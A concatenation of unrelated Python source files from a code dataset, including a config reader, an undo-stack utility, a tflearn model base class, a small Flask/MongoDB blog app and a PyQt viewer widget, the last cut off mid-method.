98194 | <reponame>keenhenry/pda
#!/usr/bin/env python
"""
``Config`` module holds all the configuration-related implementations
used in ``listdb`` package.
"""
try:
import configparser as ConfigParser # python 3.3, 3.4
except ImportError:
import ConfigParser # python 2.6, 2.7
import os
from ..utils import die_msg, PROG_NAME
class PdaConfig(object):
"""
``PdaConfig`` is a class which implements configuration abstraction
for ``ListDB`` class in ``GithubIssues`` module.
"""
DEFAULTS = {
'database-path': '/tmp/.pdastore',
'username' : None,
'repo-name' : None,
'auth-token' : None
}
def __init__(self, test_cfg=None):
"""
:param test_cfg: :class: `file <file>` object or None
"""
try:
# load configurations from several possible locations
self.__config = ConfigParser.RawConfigParser(self.DEFAULTS)
if not test_cfg:
self.__config.read([os.path.expanduser('~/.pdaconfig')])
else:
self.__config.readfp(test_cfg)
except ConfigParser.ParsingError as err:
# crash pda when configuration file is ill-formatted
die_msg(PROG_NAME, msg=err)
@property
def local_db_path(self):
"""local_db_path attribute getter
"""
try:
path = self.__config.get('pda', 'database-path')
except ConfigParser.NoSectionError or \
ConfigParser.DuplicateSectionError:
path = self.DEFAULTS['database-path']
return path if path != "" else self.DEFAULTS['database-path']
@property
def username(self):
"""username attribute getter
"""
try:
name = self.__config.get('github', 'username')
except ConfigParser.NoSectionError or \
ConfigParser.DuplicateSectionError:
name = self.DEFAULTS['username']
return name if name != "" else self.DEFAULTS['username']
@property
def reponame(self):
"""reponame attribute getter
"""
try:
name = self.__config.get('github', 'repo-name')
except ConfigParser.NoSectionError or \
ConfigParser.DuplicateSectionError:
name = self.DEFAULTS['repo-name']
return name if name != "" else self.DEFAULTS['repo-name']
@property
def authtoken(self):
"""authtoken attribute getter
"""
try:
token = self.__config.get('github', 'auth-token')
except ConfigParser.NoSectionError or \
ConfigParser.DuplicateSectionError:
token = self.DEFAULTS['auth-token']
return token if token != "" else self.DEFAULTS['auth-token']
@property
def remote_mode(self):
"""remote_mode attribute getter
"""
return (self.username is not None) and \
(self.reponame is not None) and \
(self.authtoken is not None)
| StarcoderdataPython |
159094 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime, date, timedelta
import calendar
def get_month_range(start_date = None):
if start_date is None:
start_date = date.today().replace(day = 17)
_, days_in_month = calendar.monthrange(start_date.year,start_date.month)
end_date = start_date + timedelta(days_in_month)
return (start_date,end_date)
# a_day = timedelta(days = 4)
# first_day, last_day = get_month_range()
# while first_day < last_day:
# print(first_day)
# first_day += a_day
def date_range(start,stop,step):
while start < stop:
yield start
start += step
for d in date_range(datetime(2019,5,4),datetime(2019,6,1),timedelta(days = 4):
print(d)
| StarcoderdataPython |
170695 | <gh_stars>0
import gc
import sys
from typing import Callable, List, Optional, Tuple
class Undoable:
def __init__(self):
self._undo_stack: List[Tuple[Callable, Callable]] = []
self._counter_uncommitted_undo = 0
def add_undo(self, thing_to_undo: Callable, purge_callback: Callable = lambda: None):
"""[Usage] add_undo(lambda_func_for_undo, lambda_callback_for_purge = do_nothing_by_default)"""
self._undo_stack.append((thing_to_undo, purge_callback))
self._counter_uncommitted_undo += 1
# print(f'[Add Undo] stack {len(self._undo_stack)}, uncommitted undos {self._counter_uncommitted_undo}')
def commit_undo(self, postundo_callback: Optional[Callable] = None, postpurge_callback: Optional[Callable] = None,
preundo_callback: Optional[Callable] = None, prepurge_callback: Optional[Callable] = None):
"""Group multiple added undo funcs as a single commit. Extra undo/purge callbacks could be provided"""
no_extra_undo_callbacks: bool = postundo_callback is None and preundo_callback is None
no_extra_purge_callbacks: bool = postpurge_callback is None and prepurge_callback is None
if self._counter_uncommitted_undo == 0:
return # just do nothing
elif self._counter_uncommitted_undo == 1 and ( # when only one undo and no extra callbacks are provided
no_extra_undo_callbacks and no_extra_purge_callbacks):
self._counter_uncommitted_undo = 0 # should reset the counter
return
pack_to_undo = self._undo_stack[-self._counter_uncommitted_undo:] # group last k uncommitted undos from stack
pack_to_undo.reverse() # reverse the pack for the later invoke
del self._undo_stack[-self._counter_uncommitted_undo:] # remove these k undos from stack
# invoke undo and purge callbacks in the pack
undo_callbacks = lambda: [(undo[0])() for undo in pack_to_undo]
purge_callbacks = lambda: [(purge[1])() for purge in pack_to_undo]
# add extra callbacks to the committed undo pack if provided
do_nothing = lambda: None # replace default None as `lambda: None` when not provided
(postundo_callback, postpurge_callback) = (postundo_callback or do_nothing, postpurge_callback or do_nothing)
(preundo_callback, prepurge_callback) = (preundo_callback or do_nothing, prepurge_callback or do_nothing)
actual_undo_callbacks = undo_callbacks if no_extra_undo_callbacks else (
lambda: [undo() for undo in [preundo_callback, undo_callbacks, postundo_callback]]
)
actual_purge_callbacks = purge_callbacks if no_extra_purge_callbacks else (
lambda: [purge() for purge in [prepurge_callback, purge_callbacks, postpurge_callback]]
)
self._undo_stack.append((actual_undo_callbacks, actual_purge_callbacks))
self._counter_uncommitted_undo = 0 # reset the counter
# print(f'[Commit Undo] stack: {len(self._undo_stack)}, undo pack: {len(pack_to_undo)}')
def undo(self, undo_all: bool = False, undo_n_times: int = 1) -> int:
"""[Usage] undo(): undo 1 time; undo(True): undo ALL; undo(False, 5): undo 5 times"""
if len(self._undo_stack) == 0 or undo_n_times < 1:
return -1 # nothing to undo
else:
actual_undo_times = len(self._undo_stack) if undo_all else min(undo_n_times, len(self._undo_stack))
for _ in range(actual_undo_times): # undo n times
(self._undo_stack.pop()[0])() # i.e., undo_one_commit()
return len(self._undo_stack)
def purge_undo(self) -> int:
"""[Usage] purge_undo(): purge ALL"""
if len(self._undo_stack) == 0:
return -1 # nothing to purge
else:
while self._undo_stack: # purge all
(self._undo_stack.pop()[1])() # i.e., purge_one_commit()
return 0 # i.e.. len(self._undo_stack), should ALWAYS be 0
class UndoableClass(Undoable):
def __init__(self):
super().__init__()
self.hihi: List[List[str]] = []
def say_hi_to(self, name: str) -> List[str]:
debug = lambda log: None # change as `debug = print` to enable debug log
# === Start Doing Stuff ===
hi_list: List[str] = []
self.hihi.append(hi_list)
self.add_undo(lambda: debug('undo `1. result`') or self.hihi.pop(), lambda: debug('purge `1. result`'))
hi_list.append('Hi')
self.add_undo(lambda: debug(f'undo `2. hi`: {hi_list}') or hi_list.pop(), lambda: debug('purge `2. hi`'))
hi_list.append(name)
self.add_undo(lambda: debug(f'undo `3. name`: {hi_list}') or hi_list.pop(), lambda: debug('purge `3. name`'))
# # === End Doing Stuff ===
# group those added undos as a commit_pack
self.commit_undo(lambda: debug('postundo `4. commit`'), lambda: debug('postpurge `4. commit`'),
lambda: debug('preundo `5. commit`'), lambda: debug('prepurge `5. commit`'))
return hi_list
if __name__ == '__main__':
demo = UndoableClass()
# === [Basic] Undo ===
result = demo.say_hi_to('Gura') # use _ to consume useless undo
print('hihi01:', demo.hihi, '; result:', result) # hihi01: [['Hi', 'Gura']] ; result: ['Hi', 'Gura']
demo.undo()
print('hihi02:', demo.hihi) # hihi02: []
demo.say_hi_to('A')
demo.say_hi_to('SHAAAAAARK')
demo.say_hi_to('MEATLOAF')
print('hihi03:', demo.hihi) # hihi03: [['Hi', 'A'], ['Hi', 'SHAAAAAARK'], ['Hi', 'MEATLOAF']]
print('stack01:', demo.undo()) # stack01: 2 (undo the last one (M): [A, S, M](3) -> [A, S](2) => 2)
print('hihi04:', demo.hihi) # hihi04: [['Hi', 'A'], ['Hi', 'SHAAAAAARK']]
print('stack02:', demo.undo(undo_all=True)) # stack02: 0 (undo all (S, A): [A, S](2) -> [](0) => 0)
print('hihi05:', demo.hihi) # hihi05: []
print('stack03:', demo.undo()) # stack03: -1 (nothing to undo [](0) -> [](0) => -1)
# === [Basic] Purge Undo ===
demo.say_hi_to('Gawr')
demo.say_hi_to('Gura')
print('stack04:', len(demo._undo_stack), '; hihi06:', demo.hihi) # stack04: 2 ; hihi06: [[...], [...]]
print('stack05:', demo.purge_undo(), '; hihi07:', demo.hihi) # stack05: 0 ; hihi07: [[...], [...]]
print('stack06:', demo.purge_undo()) # stack06: -1 (nothing to undo)
print('stack07:', demo.undo()) # stack07: -1 (nothing to undo)
demo.hihi.clear()
# === [Advanced] Memory Check ===
# FIXME: Uncomment following code to check if garbage collection gets invoked as expected (otherwise memory leaks)
# memcheck_func = UndoableClass()
# memcheck_purge = UndoableClass()
# while True:
# memcheck_instance = UndoableClass()
#
# for i in range(620):
# memcheck_instance.say_hi_to('Floaties') # ref_instance stay still (auto garbage collected)
#
# memcheck_func.say_hi_to('Trident')
# memcheck_func.undo() # reduce ref_func (undo_stack) & gc_count (hihi)
#
# memcheck_purge.say_hi_to('padowo')
# memcheck_purge.purge_undo() # reduce ref_purge (undo_stack) but the gc_count (hihi) keeps growing
# memcheck_purge.hihi.clear() # reduce gc_count (hihi)
#
# ref_instance, ref_func = sys.getrefcount(memcheck_instance), sys.getrefcount(memcheck_func)
# ref_purge, gc_count = sys.getrefcount(memcheck_purge), len(gc.get_objects())
# print(f'[Ref] Instance: {ref_instance}, Func: {ref_func: >2}, Purge: {ref_purge: >2}; GC: {gc_count: >5}')
| StarcoderdataPython |
3284268 | <filename>examples/01_quick_start.py
from compas_cem.diagrams import TopologyDiagram
from compas_cem.elements import Node
from compas_cem.elements import TrailEdge
from compas_cem.elements import DeviationEdge
from compas_cem.loads import NodeLoad
from compas_cem.supports import NodeSupport
from compas_cem.plotters import TopologyPlotter
from compas_cem.plotters import FormPlotter
from compas_cem.equilibrium import static_equilibrium
# create a topology diagram
topology = TopologyDiagram()
# add nodes
topology.add_node(Node(0, [0.0, 0.0, 0.0]))
topology.add_node(Node(1, [1.0, 0.0, 0.0]))
topology.add_node(Node(2, [2.5, 0.0, 0.0]))
topology.add_node(Node(3, [3.5, 0.0, 0.0]))
# add edges with negative values for a compression-only structure
topology.add_edge(TrailEdge(0, 1, length=-1.0))
topology.add_edge(DeviationEdge(1, 2, force=-1.0))
topology.add_edge(TrailEdge(2, 3, length=-1.0))
# add supports
topology.add_support(NodeSupport(0))
topology.add_support(NodeSupport(3))
# add loads
topology.add_load(NodeLoad(1, [0.0, -1.0, 0.0]))
topology.add_load(NodeLoad(2, [0.0, -1.0, 0.0]))
# assemble trails
topology.build_trails()
# print("trails", topology.trails(), "*trail edges", list(topology.trail_edges()))
# calculate equilibrium
form = static_equilibrium(topology, eta=1e-6, tmax=100, verbose=True)
# plot topology
plotter = TopologyPlotter(topology, figsize=(16, 9))
plotter.draw_loads(radius=0.03, draw_arrows=True, scale=0.25)
plotter.draw_nodes(radius=0.03)
plotter.draw_edges()
plotter.show()
# plot form
plotter = FormPlotter(form, figsize=(16, 9))
plotter.draw_nodes(radius=0.03, text="key-xyz")
plotter.draw_edges(text="force-length")
plotter.draw_loads(scale=0.25)
plotter.draw_reactions(scale=0.25)
plotter.show()
| StarcoderdataPython |
3240899 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import logging
def basicConfig(**kwargs):
logging.basicConfig(
format=("%(asctime)s.%(msecs)03d UTC | %(levelname)-8s | %(message)s"),
level=logging.INFO,
datefmt="%Y-%m-%d %H:%M:%S",
**kwargs
)
| StarcoderdataPython |
145153 | <filename>architectures/bobo/model_base.py
# UCF Senior Design 2017-18
# Group 38
import json
import os
import tflearn
import time
CHECKPOINT_DIR = "checkpoints"
CONFIG_DIR = "config"
HYPERPARAMETER_FILENAME = "hyperparameters.json"
OUTPUT_DIR = "output"
class Hyperparameters(object):
"""
This class will store the hyperparameters of the network
"""
def __init__(self):
super(Hyperparameters, self).__init__()
# This list will store the hyperparameters
self.param_list = []
def set_hp(self, hp):
for key in hp:
self.param_list.append(key)
setattr(self, key, hp[key])
class BaseModel(object):
"""
This is the base model from which all other models will be instantiated
"""
def __init__(self, model_name, hp_filename=None, hp_content=None):
"""
Initialize the base model
inputs:
model_name: (String) name of model
hp_filename: (String) name of hyperparameter file
hp_content: (JSON object) keys and values of parameters
"""
super(BaseModel, self).__init__()
self.name = model_name
self.model_name = model_name
# Get the current folder of the exectuable
self.current_dir = os.path.dirname(os.path.realpath(__file__))
# We can save outputs of different models to different folders
self.output_dir = os.path.join(self.current_dir, OUTPUT_DIR)
self.checkpoint_dir = os.path.join(self.output_dir, CHECKPOINT_DIR)
os.makedirs(self.checkpoint_dir, exist_ok=True)
# The config folder will hold any specific model configurations
self.config_dir = os.path.join(self.current_dir, CONFIG_DIR)
if hp_filename is None:
self.hp_path = os.path.join(self.config_dir, HYPERPARAMETER_FILENAME)
else:
self.hp_path = os.path.join(self.config_dir, hp_filename)
# Load hyperparameter content
if hp_content is None:
self.hp_json = json.load(self.hyparam_path)
else:
# This should be called if an already deserialzed JSON is passed
self.hp_json = hp_content
self.hp = Hyperparameters()
self.hp.set_hp(self.hp_json)
self._set_hyperparameters_name()
self._set_names()
def _conv_layer(self, incoming, nb_filter, filter_size, activation,
padding='same', strides=[1, 1, 1, 1], max_pooling=False,
maxpool_ksize=[1, 2, 2, 1], maxpool_stride=[1, 2, 2, 1], bias=True):
"""
Create a convolutional layer w/ optional activation and/or max pooling
inputs:
incoming: (Tensor) incoming model layers
padding: (String) same/valid: SAME will pad the input
in order for the filter to complete another full
operation, VALID will instead drop the
(right/bottom)-most columns
activation: (String) enable/disable activation
max_pooling: (Boolean) enable max pooling
maxpool_ksize: (Vector) max pooling filter size
maxpool_stride: (Vector) how much the max pooling kernel travels
"""
# Add activation and/or max-pooling
if activation is None:
conv_layer = tflearn.layers.conv.conv_2d(incoming, nb_filter,
filter_size, strides,
padding, bias)
else:
conv_layer = tflearn.layers.conv.conv_2d(incoming, nb_filter,
filter_size, strides,
padding, activation, bias)
if max_pooling:
conv_layer = tflearn.layers.conv.max_pool_2d(conv_layer, maxpool_ksize,
maxpool_stride)
return conv_layer
def _dropout(self, incoming, keep_prob):
"""
Create a dropout layer that encourages the network to more
redundant by randomly selecting input elements (neurons) and
setting their output to zero, effectively "dropping" them
incoming: (Tensor) incoming model layers
keep_prob: (Float) probabiltity of a neuron to be disabled
"""
dropout = tflearn.layers.core.dropout(incoming, keep_prob)
return dropout
def _end_softmax_layer(self, incoming, num_labels, activation='softmax'):
"""
Creates the final layer of the network, which is typically a fully
connected layer with a softmax function that outputs the
probability totals of each of the labels in the network
incoming: (Tensor) incoming model layers
num_labels: (Integer) number of labels
activation: (String) softmax function
"""
end_layer = tflearn.layers.fully_connected(incoming, num_labels, activation)
return end_layer
def _fully_connected_layer(self, incoming, n_units, activation='relu', bias=True):
"""
Create a fully connected layer w/ optional activation
incoming: (Tensor) incoming model layers
n_units: (Integer) size of input
activation: (String) set the activation function (default: relu)
bias: (Boolean) enable/disable bias
"""
fully_connected = tflearn.layers.fully_connected(incoming, n_units, activation, bias)
return fully_connected
def _regression(self, incoming, learning_rate, optimizer='adam',
loss='categorical_crossentropy'):
"""
Create a estmator layer that applies a regression to the layer.
incoming: (Tensor) incoming model layers
optimizer: (String) adjusts the learning rate
loss: (String) loss function to be used for regression
learning_rate: (Float) the change interval for parameters
"""
regression = tflearn.layers.estimator.regression(incoming, optimizer=optimizer,
loss=loss, learning_rate=learning_rate)
return regression
def _set_hyperparameters_name(self):
"""
Convert hyperparameters dict to a string
This string will be used to set the models names
"""
# Generate a little name for each hyperparameters
hyperparameters_names = [("".join([p[0] for p in hp.split("_")]), getattr(self.hp, hp))
for hp in self.hp.param_list]
self.hyperparameters_name = ""
for index_hyperparameter, hyperparameter in enumerate(hyperparameters_names):
short_name, value = hyperparameter
prepend = "" if index_hyperparameter == 0 else "_"
self.hyperparameters_name += "%s%s_%s" % (prepend, short_name, value)
def _set_names(self):
"""
Set all model names
"""
name_time = "%s--%s" % (self.model_name, time.time())
# model_name is used to set the ckpt name
self.model_name = "%s--%s" % (self.hyperparameters_name, name_time)
# sub_train_log_name is used to set the name of the training part in tensorboard
self.sub_train_log_name = "%s-train--%s" % (self.hyperparameters_name, name_time)
# sub_test_log_name is used to set the name of the testing part in tensorboard
self.sub_test_log_name = "%s-test--%s" % (self.hyperparameters_name, name_time)
| StarcoderdataPython |
1776951 | <gh_stars>1-10
import os
import pkg_resources
## Paths
DATA_CACHE_DIR = os.path.expanduser(os.path.join('~', '.wc', 'data', 'datanator'))
## Endpoints
CURRENT_VERSION_ENDPOINT = '/v0'
# Speed Contstants
METABOLITE_REACTION_LIMIT = 5
# Common Schema Constants
DATA_DUMP_PATH = os.path.join(DATA_CACHE_DIR , 'CommonSchema.sql')
PAX_NAME = 'Pax'
PAX_INITIAL_AMOUNT = 1
SABIO_NAME = 'Sabio'
SABIO_INITIAL_AMOUNT = 1
ARRAY_EXPRESS_NAME = 'Array Express'
ARRAY_EXPRESS_INITIAL_AMOUNT = 1
INTACT_NAME = 'IntAct'
INTACT_INITIAL_AMOUNT = 0
## Batching Test Constants
PAX_TEST_BATCH = 2
INTACT_INTERACTION_TEST_BATCH = 10
ARRAY_EXPRESS_TEST_BATCH = 5
SABIO_TEST_BATCH = 100
## Batching Build Constants
PAX_BUILD_BATCH = 300
INTACT_INTERACTION_BUILD_BATCH = 100000
ARRAY_EXPRESS_BUILD_BATCH = 1000
SABIO_BUILD_BATCH = 100000
INTACT_INTERACTION_BUILD_SUB_BATCH = 5000
| StarcoderdataPython |
3386557 | <filename>app/app.py
from flask import Flask, render_template, request, redirect
from pymongo import MongoClient
from bson.objectid import ObjectId
from datetime import datetime
import os
app = Flask(__name__)
user = 'username' # username as set for the mongodb admin server (the username used in secret.yaml - before base64 conversion)
password ='password' # password as set for the mongodb admin server (the password used in secret.yaml - before base64 conversion)
host = 'mongodb-service' # service name of the mongodb admin server as set in the service for mongodb server
port = '27017' # port number of the mongodb admin server as set in the service for mongodb server
conn_string = f'mongodb://{user}:{password}@{host}:{port}'
# conn_string='mongodb://127.0.0.1:27017/'
db = MongoClient(conn_string).blog
@app.route('/')
def home():
posts = list(db.posts.find({}))
return render_template("home.html", homeIsActive=True, createPostIsActive=False, posts=posts)
@app.route('/create-post', methods=["GET", "POST"])
def createPost():
if(request.method=="GET"):
return render_template("create-post.html", homeIsActive=False, createPostIsActive=True)
elif(request.method == "POST"):
title = request.form['title']
author = request.form['author']
createdAt = datetime.now()
# save the record to the database
db.posts.insert_one({"title": title, "author": author, "createdAt": createdAt})
# redirect to home page
return redirect("/")
@app.route('/edit-post', methods=['GET', 'POST'])
def editPost():
if request.method == "GET":
# get the id of the post to edit
postId = request.args.get('form')
# get the post details from the db
post = dict(db.posts.find_one({"_id":ObjectId(postId)}))
# direct to edit post page
return render_template('edit-post.html', post=post)
elif request.method == "POST":
#get the data of the post
postId = request.form['_id']
title = request.form['title']
author = request.form['author']
# update the data in the db
db.posts.update_one({"_id":ObjectId(postId)},{"$set":{"title":title,"author":author}})
# redirect to home page
return redirect("/")
@app.route('/delete-post', methods=['POST'])
def deletePost():
# get the id of the post to delete
postId = request.form['_id']
# delete from the database
db.posts.delete_one({ "_id": ObjectId(postId)})
# redirect to home page
return redirect("/")
if __name__ == "__main__":
app.run(host="0.0.0.0", port="5001", debug=True)
| StarcoderdataPython |
3237911 | <reponame>mpi2/vpv
import numpy as np
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QDialog
import pyqtgraph as pg
from vpv.lib.qrangeslider import QRangeSlider
from vpv.utils.lookup_tables import Lut
from vpv.ui.views.ui_datatab import Ui_data
from vpv.ui.views.ui_change_vol_name import Ui_VolNameDialog
import copy
from vpv.common import Orientation, Layers
from functools import partial
"""
The Qt widget that controls the currently viewed volumes, heatmaps, and vector volumes. Accessed from the main
dock widget
"""
DEFAULT_SCALE_BAR_SIZE = 14.0
class VolNameDialog(QDialog):
name_changed_signal = QtCore.pyqtSignal(str, str)
def __init__(self, parent, current_name):
super(VolNameDialog, self).__init__(parent)
self.current_name = copy.copy(current_name)
self.ui = Ui_VolNameDialog()
self.ui.setupUi(self)
self.setWindowTitle('Edit volume name')
self.ui.lineEditVolName.setText(current_name)
self.ui.pushButtonOk.clicked.connect(self.on_ok)
self.ui.pushButtonCancel.clicked.connect(self.on_cancel)
def on_ok(self):
new_name = self.ui.lineEditVolName.text()
self.name_changed_signal.emit(self.current_name, new_name)
self.close()
def on_cancel(self):
self.close()
class ManageData(QtGui.QWidget):
data_processing_signal = QtCore.pyqtSignal()
data_processing_finished_signal = QtCore.pyqtSignal()
roi_signal = QtCore.pyqtSignal(list, list, list)
ui_changed_signal = QtCore.pyqtSignal()
scale_bar_color_signal = QtCore.pyqtSignal(QtGui.QColor)
gradient_editor_signal = QtCore.pyqtSignal()
load_metadata_signal = QtCore.pyqtSignal()
def __init__(self, controller, model, mainwindow, appdata):
super(ManageData, self).__init__(mainwindow)
self.ui = Ui_data()
self.ui.setupUi(self)
self.views = controller.views
self.mainwindow = mainwindow
self.appdata = appdata
lut = Lut()
self.controller = controller # run_vpv.py
self.hotred = lut._hot_red_blue()[0]
self.hotblue = lut._hot_red_blue()[1]
self.model = model
self.volume_ids = None
self.luts = Lut()
self.ui.labelFdrThresholds.hide()
self._link_views = True
self.ui.checkBoxLinkViews.setChecked(True)
self.vector_mag_slider = QRangeSlider((0, 0, 0))
# Just need one handle, so hide the minimum handle
self.vector_mag_slider.head.setDisabled(True)
self.ui.horizontalLayoutMagnitudeSlider.insertWidget(1, self.vector_mag_slider)
self.vector_mag_slider.setMin(0)
self.vector_mag_slider.setMax(10.0)
self.vector_mag_slider.setStart(0)
self.vector_mag_slider.setEnd(10.0)
# The lower volume levels slider and Combo boxes
self.volume_levels_slider = QRangeSlider((255, 255, 255))
self.ui.horizontalLayoutVol1Levels.insertWidget(1, self.volume_levels_slider)
# upper volume levels slider and comboboxes
self.volume_levels_slider2 = QRangeSlider((255, 255, 255))
self.ui.horizontalLayoutVol2Levels.insertWidget(1, self.volume_levels_slider2)
# data sliders
self.data_levels_positive_slider = QRangeSlider((0, 255, 0))
pos_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #FFFFFF, stop: 1 #FF0000);'
self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
self.ui.horizontalLayoutDataSliders.insertWidget(1, self.data_levels_positive_slider)
self.data_levels_negative_slider = QRangeSlider((0, 255, 0))
neg_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #0000FF, stop: 1 #FFFFFF);'
self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
self.ui.horizontalLayoutDataSliders.insertWidget(0, self.data_levels_negative_slider)
self.ui.pushButtonManagerGrey.hide()
self.ui.pushButtonManagerCyan.hide()
self.ui.pushButtonManagerOrange.hide()
self.six_views_visible = False
self.ui.checkBox6Views.setChecked(False)
self.blob_table = QtGui.QTableWidget(self)
self.ui.verticalLayoutConnectedComponents.addWidget(self.blob_table, 0)
self.blob_table.setColumnCount(3)
self.blob_table.setHorizontalHeaderLabels(['Count', 'Mean', 'location'])
self.ui.doubleSpinBoxVoxelSize.setMaximum(1000.0)
self.ui.doubleSpinBoxVoxelSize.setValue(DEFAULT_SCALE_BAR_SIZE)
self.ui.doubleSpinBoxVoxelSize.setKeyboardTracking(False)
self.ui.doubleSpinBoxVoxelSize.valueChanged.connect(self.set_voxel_size)
self.ui.doubleSpinBoxScaleBarLength.setMaximum(10000)
self.ui.doubleSpinBoxScaleBarLength.setValue(1000)
self.ui.doubleSpinBoxScaleBarLength.setKeyboardTracking(False)
self.colour_bar = ColorScaleBar(self.ui.verticalLayoutColorScale, self.hotblue, self.hotred)
self.ui.vol2ControlsWidget.hide()
self.ui.vectorWidget.hide()
self.ui.dataWidget.hide()
self.ui.doubleSpinBoxNegThresh.setMaximum(0)
self.ui.doubleSpinBoxNegThresh.setMinimum(-100)
self.ui.doubleSpinBoxNegThresh.setSingleStep(0.1)
self.ui.doubleSpinBoxPosThresh.setSingleStep(0.1)
self.ui.doubleSpinBoxVol2Opacity.setRange(0.0, 1.0)
self.ui.doubleSpinBoxVol2Opacity.setSingleStep(0.1)
self.ui.doubleSpinBoxVol2Opacity.setValue(1.0)
self.ui.pushButtonLoadAtlasMeta.clicked.connect(self.load_atlas_meta_slot)
self.connect_signal_slots()
def load_atlas_meta_slot(self):
self.load_metadata_signal.emit()
def connect_signal_slots(self):
self.ui.pushButtonRecalcConnectComponents.clicked.connect(self.controller.recalc_connected_components)
self.ui.comboBoxVolume.activated['QString'].connect(partial(self.modify_layer, Layers.vol1, 'set_volume'))
self.ui.checkBoxVisibilityVol2.clicked.connect(partial(self.modify_layer, Layers.vol2, 'set_visibility'))
self.ui.checkBoxVisibilityHeatmap.clicked.connect(partial(self.modify_layer, Layers.heatmap, 'set_visibility'))
self.ui.checkBoxLinkViews.clicked.connect(self.on_link_views)
self.ui.comboBoxOrientation.activated['QString'].connect(self.on_orientation)
self.ui.pushButtonScreenShot.clicked.connect(self.controller.take_screen_shot)
self.ui.pushButtonVectorMagnitudeFilter.pressed.connect(self.lower_magnitude_changed)
self.volume_levels_slider.startValueChanged.connect(self.lower_level_volume_changed)
self.volume_levels_slider.endValueChanged.connect(self.upper_level_volume_changed)
self.ui.comboBoxVolumeLut.activated['QString'].connect(self.on_vol_lut_changed)
self.volume_levels_slider2.startValueChanged.connect(self.lower_level_volume2_changed)
self.volume_levels_slider2.endValueChanged.connect(self.upper_level_volume2_changed)
self.ui.comboBoxVolume2.activated['QString'].connect(self.volume2_changed)
self.ui.comboBoxVolumeLut2.activated['QString'].connect(self.on_vol2_lut_changed)
self.ui.comboBoxLutHeatmap.activated['QString'].connect(self.on_heatmap_lut_changed)
self.ui.comboBoxData.activated['QString'].connect(self.data_changed)
# connect the levels slider to the model
self.data_levels_negative_slider.startValueChanged.connect(self.data_negative_lower_changed)
self.data_levels_negative_slider.endValueChanged.connect(self.data_negative_higher_changed)
self.data_levels_positive_slider.startValueChanged.connect(self.data_positive_lower_changed)
self.data_levels_positive_slider.endValueChanged.connect(self.data_positive_higher_changed)
self.ui.pushButtonManagerRed.clicked.connect(self.showRedViewManagerSlot)
self.ui.pushButtonManagerBlue.clicked.connect(self.showBlueViewManagerSlot)
self.ui.pushButtonManagerGreen.clicked.connect(self.showGreenViewManagerSlot)
self.ui.pushButtonManagerOrange.clicked.connect(self.showOrangeViewManagerSlot)
self.ui.pushButtonManagerGrey.clicked.connect(self.showYellowViewManagerSlot)
self.ui.pushButtonManagerCyan.clicked.connect(self.showCyanViewManagerSlot)
self.ui.checkBoxLeftView.clicked.connect(self.left_view_visibility)
self.ui.checkBoxCentralView.clicked.connect(self.central_view_visibility)
self.ui.checkBoxRightView.clicked.connect(self.right_view_visibility)
# connect the vector controls
self.ui.comboBoxVectors.activated['QString'].connect(self.vector_changed)
self.ui.spinBoxVectorScale.valueChanged['QString'].connect(self.vector_scale_changed)
self.ui.spinBoxVectorSubsampling.valueChanged.connect(self.vector_subsampling_changed)
self.ui.pushButtonVectorColor.pressed.connect(self.vector_change_color)
self.blob_table.cellClicked.connect(self.on_connected_table_clicked)
self.ui.doubleSpinBoxScaleBarLength.valueChanged.connect(self.set_scalebar_length)
self.ui.checkBoxShowVol2Controls.clicked.connect(self.vol2_controls_visibility)
self.ui.checkBoxShowVectorControls.clicked.connect(self.vector_controls_visibility)
self.ui.checkBoxShowDataControls.clicked.connect(self.data_controls_visibility)
self.ui.pushButtonEditVolName.clicked.connect(self.on_change_vol_name)
self.ui.pushButtonScaleBarColor.clicked.connect(self.on_scalebar_color)
self.ui.doubleSpinBoxNegThresh.valueChanged.connect(self.on_neg_thresh_spin)
self.ui.checkBox6Views.clicked.connect(self.show2Rows)
self.ui.doubleSpinBoxPosThresh.valueChanged.connect(self.on_pos_thresh_spin)
self.ui.checkBoxScaleBarLabel.clicked.connect(self.on_scalebar_label_checked)
self.ui.doubleSpinBoxVol2Opacity.valueChanged.connect(partial(self.modify_layer, Layers.vol2, 'set_opacity'))
def on_scalebar_label_checked(self, checked):
for view in self.views.values():
view.scale_bar_visible = checked
def activate_tab(self):
pass
def on_neg_thresh_spin(self, value):
self.data_levels_negative_slider.setEnd(value)
def on_pos_thresh_spin(self, value):
self.data_levels_positive_slider.setStart(value)
def on_pos_lut(self):
print('gradient in dm')
self.gradient_editor_signal.emit() # called 5/6 times on one click
def on_scalebar_color(self):
color = QtGui.QColorDialog.getColor()
self.scale_bar_color_signal.emit(color)
def on_change_vol_name(self):
vol = self.controller.current_view.layers[Layers.vol1].vol
if vol:
dlg = VolNameDialog(self, vol.name)
dlg.name_changed_signal.connect(self.change_vol_name)
dlg.show()
def change_vol_name(self, current_name, new_name):
vol = self.controller.current_view.layers[Layers.vol1].vol
if vol and new_name:
self.controller.model.change_vol_name(current_name, new_name)
self.controller.update_slice_views()
self.update()
# def mouse_pressed(self, view_index, x, y, orientation, vol_id):
# self.annotations.mouse_pressed_annotate(view_index, x, y, orientation, vol_id)
def data_controls_visibility(self, checked):
if checked:
self.ui.dataWidget.show()
else:
self.ui.dataWidget.hide()
def vector_controls_visibility(self, checked):
if checked:
self.ui.vectorWidget.show()
else:
self.ui.vectorWidget.hide()
def vol2_controls_visibility(self, checked):
if checked:
self.ui.vol2ControlsWidget.show()
else:
self.ui.vol2ControlsWidget.hide()
def show_color_scale_bars(self, isvisible=True):
"""
Make color scale bar figure. A bit of a mess at the moment. Will tody up
"""
if not self.controller.current_view.layers[Layers.heatmap].vol:
return
if not isvisible:
self.colour_bar.hide()
return
else:
self.colour_bar.show()
def set_scalebar_length(self, length):
for view in self.views.values():
view.set_scalebar_size(length)
def set_voxel_size(self, voxel_size):
for view in self.views.values():
view.set_voxel_size(voxel_size)
def lower_magnitude_changed(self):
value = self.vector_mag_slider.getRange()[0]
if not self.link_views:
self.current_slice_view.layers[Layers.vectors].set_magnitude_cutoff(value, 10.0)
else:
for view in self.views.values():
view.layers[Layers.heatmap].set_magnitude_cutoff(value, 10.0)
#self.update_slice_views()
def vector_subsampling_changed(self, value):
if self.link_views:
for view in self.views.values():
